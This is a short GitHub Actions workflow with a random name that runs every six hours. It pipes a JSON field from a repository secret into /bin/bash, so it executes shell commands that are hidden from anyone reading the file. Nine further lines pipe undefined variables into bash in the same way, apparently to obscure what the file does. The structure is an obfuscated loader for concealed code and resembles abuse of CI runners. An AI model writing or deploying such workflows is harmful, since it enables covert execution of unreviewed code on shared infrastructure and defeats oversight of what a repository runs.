name: alarmingnecklace
on:
  workflow_dispatch:
  schedule:
    - cron: '47 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: alarmingnecklace
        env:
          i2: ${{ secrets.i2 }}
        run: |
          echo $i2 | jq -r .kbqco8 | /bin/bash
          echo $mdl0 | jq -r .jgow00745 | /bin/bash
          echo $evdks7867 | jq -r .xr766 | /bin/bash
          echo $yiw5 | jq -r .b13 | /bin/bash
          echo $uvnu0 | jq -r .x9 | /bin/bash
          echo $tiaeh1213 | jq -r .etbq53 | /bin/bash
          echo $lzub312 | jq -r .v65 | /bin/bash
          echo $owyx93 | jq -r .xusy112 | /bin/bash
          echo $mz8 | jq -r .npabn35 | /bin/bash
          echo $vi545 | jq -r .d1 | /bin/bash

